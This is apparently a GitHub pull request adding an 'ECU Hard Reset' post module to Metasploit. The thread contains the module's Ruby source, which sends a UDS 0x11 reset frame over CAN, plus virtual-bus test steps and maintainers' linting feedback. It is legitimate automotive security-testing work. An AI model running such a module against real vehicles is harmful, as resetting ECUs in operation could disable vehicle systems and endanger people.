Add ECU Hard Reset for hwbridge

[shipcod3]

Introduction

This module performs hard reset in the ECU Reset Service Identifier (0x11).

Verification Steps

Fire up virtual CAN bus:

1. sudo modprobe can
2. sudo modprobe vcan
3. sudo ip link add dev vcan0 type vcan
4. sudo ip link set up vcan0

Launch msf:

5. Start msfconsole
6. use auxiliary/server/local_hwbridge
7. set uripath testbus
8. run
9. use auxiliary/client/hwbridge/connect
10. set targeturi testbus

Options

ARBID
CAN ID to perform ECU Hard Reset (Default: 0x7DF)

CANBUS
CAN Bus to perform scan on, defaults to connected bus

Scenarios

Using UDS simulator for testing ECU hard reset:

msf5 auxiliary(client/hwbridge/connect) > run
[*] Running module against 127.0.0.1

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-09-11 04:59:40 -0700
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf5 auxiliary(client/hwbridge/connect) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf5 auxiliary(client/hwbridge/connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > run post/hardware/automotive/ecu_hard_reset CANBUS=vcan0

[*] Performing ECU Hard Reset...

You can use candump to verify the CAN messages being sent:

─$ candump vcan0          
  vcan0  7DF   [8]  02 11 01 00 00 00 00 00

UDS Server Output

└─$ ./uds-server -v -V "PWN3D" vcan0            
Using CAN interface vcan0
Fuzz level set to: 0
Pkt: 7DF#02 11 01 00 00 00 00 00 
Unhandled mode/sid: ECU Reset

[shipcod3]

Hmm, I am not sure why msftidy keeps on failing here despite not getting errors from my end.

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[adfoster-r7]

The bot should hopefully shed some light on how to fix the linting issues 👍

[shipcod3]

I guess it is failing because of this error:

modules/post/hardware/automotive/ecu_hard_reset.rb - [INFO] No CVE references found. Please check before you land!

[dwelch-r7]

I guess it is failing because of this error:

modules/post/hardware/automotive/ecu_hard_reset.rb - [INFO] No CVE references found. Please check before you land!

No that's informational only, this is the relevant error
1 file inspected, 6 offenses detected, 5 offenses auto-correctable modules/post/hardware/automotive/ecu_hard_reset.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/post/hardware/automotive/ecu_hard_reset.rb and verify all issues are resolved

[shipcod3]

I see, I am getting these errors when I run rubocop -a modules/post/hardware/automotive/ecu_hard_reset.rb:

Inspecting 1 file
C

Offenses:

modules/post/hardware/automotive/ecu_hard_reset.rb:1:1: C: Style/FrozenStringLiteralComment: Missing frozen string literal comment.
##
^
modules/post/hardware/automotive/ecu_hard_reset.rb:6:1: C: Style/Documentation: Missing top-level class documentation comment.
class MetasploitModule < Msf::Post
^^^^^
modules/post/hardware/automotive/ecu_hard_reset.rb:7:3: C: Metrics/MethodLength: Method has too many lines. [11/10]
  def initialize(info = {}) ...
  ^^^^^^^^^^^^^^^^^^^^^^^^^

rubocop then indents a lot of spaces in the info and register_options.

I fixed it with 2 indentations and then make changes here and it still fails.

[adfoster-r7]

This is the output I get after running Rubocop locally, with the same command you posted:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ECU Hard Reset',
        'Description' => ' This module performs hard reset in the ECU Reset Service Identifier (0x11)',
        'License' => MSF_LICENSE,
        'Author' => ['Jay Turla'],
        'Platform' => ['hardware'],
        'SessionTypes' => ['hwbridge']
      )
    )
    register_options([
      OptString.new('ARBID', [false, 'CAN ID to perform ECU Hard Reset', '0x7DF']),
      OptString.new('CANBUS', [false, 'CAN Bus to perform scan on, defaults to connected bus', nil])
    ])
  end

  def run
    unless client.automotive
      print_error('The hwbridge requires a functional automotive extention')
      return
    end
    print_status('Performing ECU Hard Reset...')
    client.automotive.cansend(datastore['CANBUS'], datastore['ARBID'], '0211010000000000')
  end

end

After that, it's still missing the stability notes in the metadata section:

        # All new modules must contain the below information. See below for more details for allowed values
        'Notes' => {
          'Stability' => [...],
          'Reliability' => [...],
          'SideEffects' => [...]
        }

Documentation for that is here: https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability 👍

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[shipcod3]

Finally! I have also added the documentation.

[adfoster-r7]

Thanks! Will land this shortly

[adfoster-r7]

Release Notes

Adds a new ecu_hard_reset hardware module which performs a hard reset in the ECU Reset Service Identifier (0x11)